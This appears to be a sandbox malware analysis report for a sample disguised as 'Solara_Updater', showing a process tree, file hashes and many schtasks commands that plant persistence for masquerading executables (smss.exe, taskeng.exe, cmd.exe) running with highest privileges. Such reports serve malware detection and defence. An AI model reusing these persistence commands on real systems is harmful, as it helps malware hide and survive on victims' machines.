                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              66⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  67⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    67⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        68⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        67⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            68⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              68⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  69⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  68⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      69⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        69⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            70⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            69⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                70⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  70⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      71⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      70⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              taskeng.exe {AD184026-3B1F-4DEE-8D23-332027688C9C} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\svhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\svhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\svhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\svhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\svhost.exe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\svhost.exe.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\hostNet\smss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\hostNet\smss.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\svhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\svhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\hostNet\smss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\hostNet\smss.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\svhost.exe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\svhost.exe.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\hostNet\smss.exe'" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\hostNet\smss.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\hostNet\smss.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\cmd.exe'" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\cmd.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\cmd.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\hostNet\conhost.exe'" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\hostNet\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\hostNet\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 5 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:908

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Google\cmd.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8ccc428a5a6f6139dc191d332f3de08b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ae550a8fb67deeb1350020aa3fe8b0339db6bc71

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9SWtAvUg1NoDc9b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            46KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            02d2c46697e3714e49f46b680b9a6b83

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            84f98b56d49f01e9b6b76a4e21accf64fd319140

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\J32gOpl9AqlVJL6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            c9ff7748d8fcef4cf84a5501e996a641

